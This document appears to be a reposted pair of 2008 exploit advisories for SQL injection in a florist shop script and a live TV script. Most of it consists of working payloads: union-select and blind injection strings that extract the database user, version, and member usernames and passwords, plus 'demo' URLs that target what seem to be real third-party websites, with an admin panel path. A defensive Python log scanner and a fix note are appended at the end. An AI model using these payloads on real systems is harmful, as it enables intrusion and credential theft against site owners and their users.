abarcar Florist Shop System Script content.php (cat) Blind/Remote SQL Injection
link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt
link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/
Discovered By: ZoRLu
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit for demo (the result appears in the page title):
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
Wednesday, 31 December 2008
Tuesday, 9 September 2008
Live TV Script (index.php mid) SQL Injection Vulnerability
Discovered By: ZoRLu
Original bug:
http://www.milw0rm.com/exploits/6404
Exploit :
http://localhost/script_path/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--
Demo:
http://indiaportal.org/demo/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--
Admin Panel:
http://localhost/script_path/siteadmin/
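Both advisories above inject through a parameter that normally carries a numeric id (`cat` in content.php, `mid` in index.php). The following is an added example, not part of the original advisories: it scans web access logs and flags requests where those parameters are not plain integers. The log lines are constructed, and treating both ids as unsigned integers of at most 10 digits is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> id parameter named in the two advisories.
# Assumption: legitimate values are unsigned integers of at most 10 digits.
NUMERIC_PARAMS = {"content.php": "cat", "index.php": "mid"}

# Request field of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for non-integer ids."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = NUMERIC_PARAMS.get(script)
        if param is None:
            continue
        # parse_qsl decodes '+' and %xx, so encoded payloads are compared decoded.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and not re.fullmatch(r"\d{1,10}", value):
                hits.append((line_no, script, param, value))
    return hits


# Constructed access-log lines; client IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2008:10:00:01 +0000] "GET /shop/content.php?cat=125 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Dec/2008:10:00:07 +0000] "GET /shop/content.php?cat=125+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Dec/2008:10:00:09 +0000] "GET /shop/content.php?cat=125+and+substring(@@version,1,1)=3 HTTP/1.1" 200 310',
    '192.0.2.77 - - [09/Sep/2008:08:12:30 +0000] "GET /tv/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members-- HTTP/1.1" 200 2048',
    '192.0.2.10 - - [09/Sep/2008:08:13:00 +0000] "GET /tv/index.php?mid=32 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, applied in the application before the value reaches the query (or replaced by a parameterized query), closes the injection point itself.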